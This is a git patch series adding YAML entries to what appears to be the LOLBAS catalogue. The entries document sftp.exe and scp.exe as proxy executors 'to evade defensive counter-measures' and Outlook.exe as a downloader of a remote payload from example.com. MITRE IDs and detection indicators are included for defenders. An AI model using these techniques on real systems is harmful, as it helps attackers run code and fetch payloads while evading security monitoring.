From 860246fe1816001b186ab4f5e0347b81918ffd3c Mon Sep 17 00:00:00 2001 From: C-h4ck-0 <48152831+C-h4ck-0@users.noreply.github.com> Date: Sun, 6 Nov 2022 20:19:45 +0700 Subject: [PATCH 1/8] Add sftp.exe executor c:\windows\system32\openssh\sftp.exe with the -D flag, is able to execute another exe file --- yml/OSBinaries/sftp | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 yml/OSBinaries/sftp diff --git a/yml/OSBinaries/sftp b/yml/OSBinaries/sftp new file mode 100644 index 00000000..114b9f3e --- /dev/null +++ b/yml/OSBinaries/sftp @@ -0,0 +1,20 @@ +--- +Name: sftp.exe +Description: SSH File Transfer Protocol +Author: Nir Chako +Created: 2022-11-06 +Commands: + - Command: "sftp -D c:\windows\system32\notepad.exe" + Description: Execute notepad.exe with sftp.exe as parent process + Usecase: Use sftp.exe as a proxy binary to evade defensive counter-measures + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 10, Windows 11 +Full_Path: + - Path: c:\windows\system32\OpenSSH\sftp.exe +Detection: + - IOC: sftp.exe spawning unexpected processes +Acknowledgement: + - Person: 'Nir Chako (Pentera)' + Handle: '@C_h4ck_0' From da86328865090c6ee802789a4117b0e46ae93ad2 Mon Sep 17 00:00:00 2001 From: C-h4ck-0 <48152831+C-h4ck-0@users.noreply.github.com> Date: Sun, 6 Nov 2022 20:26:13 +0700 Subject: [PATCH 2/8] Rename sftp to sftp.yml --- yml/OSBinaries/{sftp => sftp.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename yml/OSBinaries/{sftp => sftp.yml} (100%) diff --git a/yml/OSBinaries/sftp b/yml/OSBinaries/sftp.yml similarity index 100% rename from yml/OSBinaries/sftp rename to yml/OSBinaries/sftp.yml From 8fafb0217113ce1e09068da26198c8da04c9686e Mon Sep 17 00:00:00 2001 From: C-h4ck-0 <48152831+C-h4ck-0@users.noreply.github.com> Date: Sun, 6 Nov 2022 20:31:24 +0700 Subject: [PATCH 3/8] fix yaml-lint syntax error --- yml/OSBinaries/sftp.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/sftp.yml b/yml/OSBinaries/sftp.yml index 114b9f3e..22396c96 100644 --- a/yml/OSBinaries/sftp.yml +++ b/yml/OSBinaries/sftp.yml @@ -4,7 +4,7 @@ Description: SSH File Transfer Protocol Author: Nir Chako Created: 2022-11-06 Commands: - - Command: "sftp -D c:\windows\system32\notepad.exe" + - Command: "sftp -D c:\\windows\\system32\\notepad.exe" Description: Execute notepad.exe with sftp.exe as parent process Usecase: Use sftp.exe as a proxy binary to evade defensive counter-measures Category: Execute From 0c0e242481037c01ee35504d451b777006338516 Mon Sep 17 00:00:00 2001 From: C-h4ck-0 <48152831+C-h4ck-0@users.noreply.github.com> Date: Tue, 8 Nov 2022 21:53:10 +0700 Subject: [PATCH 4/8] Add Outlook.exe downloader --- yml/OtherMSBinaries/Outlook.yml | 34 +++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 yml/OtherMSBinaries/Outlook.yml diff --git a/yml/OtherMSBinaries/Outlook.yml b/yml/OtherMSBinaries/Outlook.yml new file mode 100644 index 00000000..a7efcf35 --- /dev/null +++ b/yml/OtherMSBinaries/Outlook.yml @@ -0,0 +1,34 @@ +--- +Name: Outlook.exe +Description: Microsoft Office component +Author: Nir Chako +Created: 2022-11-08 +Commands: + - Command: Outlook.exe https://example.com/payload + Description: Downloads payload from remote server + Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 +Full_Path: + - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Outlook.exe + - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Outlook.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office16\Outlook.exe + - Path: C:\Program Files\Microsoft Office\Office16\Outlook.exe + - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Outlook.exe + - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Outlook.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office15\Outlook.exe + - Path: C:\Program Files\Microsoft Office\Office15\Outlook.exe + - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Outlook.exe + - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Outlook.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office14\Outlook.exe + - Path: C:\Program Files\Microsoft Office\Office14\Outlook.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office12\Outlook.exe + - Path: C:\Program Files\Microsoft Office\Office12\Outlook.exe + - Path: C:\Program Files\Microsoft Office\Office12\Outlook.exe +Detection: + - IOC: Suspicious Office application internet/network traffic +Acknowledgement: + - Person: Nir Chako (Pentera) + Handle: '@C_h4ck_0' From 613afe8ef59d1f6b7d0b0825f8480ffc2d7d43c7 Mon Sep 17 00:00:00 2001 From: C-h4ck-0 <48152831+C-h4ck-0@users.noreply.github.com> Date: Sun, 13 Nov 2022 20:50:14 +0700 Subject: [PATCH 5/8] Create scp.yml Executor and Downloader --- yml/OSBinaries/scp.yml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 yml/OSBinaries/scp.yml diff --git a/yml/OSBinaries/scp.yml b/yml/OSBinaries/scp.yml new file mode 100644 index 00000000..f3b584bd --- /dev/null +++ b/yml/OSBinaries/scp.yml @@ -0,0 +1,28 @@ +--- +Name: scp.exe +Description: Secure Copy Protocol +Author: Nir Chako +Created: 2022-11-06 +Commands: + - Command: 'scp -S "C:\windows\system32\notepad.exe" file.txt localhost:' + Description: Execute notepad.exe with scp.exe as parent process + Usecase: Use scp.exe as a proxy binary to evade defensive counter-measures + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 10, Windows 11 + - Command: "scp @192.168.187.128: " + Description: Download file with scp.exe from am SSH server + Usecase: Use scp.exe to download file from an SSH server. If needed, you will be asked to submit a password as well. + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 +Full_Path: + - Path: c:\windows\system32\OpenSSH\scp.exe +Detection: + - IOC: scp.exe spawning unexpected processes + - IOC: Suspicious SSH internet/network traffic +Acknowledgement: + - Person: 'Nir Chako (Pentera)' + Handle: '@C_h4ck_0' From 354553efa3cddb5b8803813e0f05d6fbb5bb7603 Mon Sep 17 00:00:00 2001 From: C-h4ck-0 <48152831+C-h4ck-0@users.noreply.github.com> Date: Mon, 14 Nov 2022 12:04:58 +0700 Subject: [PATCH 6/8] Update scp.yml Added upload functionality --- yml/OSBinaries/scp.yml | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/yml/OSBinaries/scp.yml b/yml/OSBinaries/scp.yml index f3b584bd..73c72d83 100644 --- a/yml/OSBinaries/scp.yml +++ b/yml/OSBinaries/scp.yml @@ -12,12 +12,19 @@ Commands: MitreID: T1202 OperatingSystem: Windows 10, Windows 11 - Command: "scp @192.168.187.128: " - Description: Download file with scp.exe from am SSH server - Usecase: Use scp.exe to download file from an SSH server. If needed, you will be asked to submit a password as well. + Description: Download file with scp.exe from an SSH server + Usecase: Use scp.exe to download file from an SSH server. If needed, you will be asked to submit a password for the SSH session. Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 + - Command: "scp @192.168.187.128:" + Description: Upload file with scp.exe to an SSH server + Usecase: Use scp.exe to Upload file from the local machine to remote SSH server. If needed, you will be asked to submit a password for the SSH session. + Category: Upload + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\OpenSSH\scp.exe Detection: From 519b5fcbd7100c6f0d19831ac04183eb71fb2adf Mon Sep 17 00:00:00 2001 From: C-h4ck-0 <48152831+C-h4ck-0@users.noreply.github.com> Date: Mon, 14 Nov 2022 12:33:41 +0700 Subject: [PATCH 7/8] Update scp.yml Added a copy functionality --- yml/OSBinaries/scp.yml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/yml/OSBinaries/scp.yml b/yml/OSBinaries/scp.yml index 73c72d83..a322d357 100644 --- a/yml/OSBinaries/scp.yml +++ b/yml/OSBinaries/scp.yml @@ -25,6 +25,13 @@ Commands: Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 + - Command: "scp " + Description: Copy file with scp.exe to a local path + Usecase: Use scp.exe to Copy a file from one location to another. + Category: Copy + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\OpenSSH\scp.exe Detection: From e39a3af314fc851b8a25e3f1c57fbdb59f2d5ca2 Mon Sep 17 00:00:00 2001 From: C-h4ck-0 <48152831+C-h4ck-0@users.noreply.github.com> Date: Mon, 14 Nov 2022 12:36:40 +0700 Subject: [PATCH 8/8] Update scp.yml --- yml/OSBinaries/scp.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/scp.yml b/yml/OSBinaries/scp.yml index a322d357..8a895a25 100644 --- a/yml/OSBinaries/scp.yml +++ b/yml/OSBinaries/scp.yml @@ -2,7 +2,7 @@ Name: scp.exe Description: Secure Copy Protocol Author: Nir Chako -Created: 2022-11-06 +Created: 2022-11-14 Commands: - Command: 'scp -S "C:\windows\system32\notepad.exe" file.txt localhost:' Description: Execute notepad.exe with scp.exe as parent process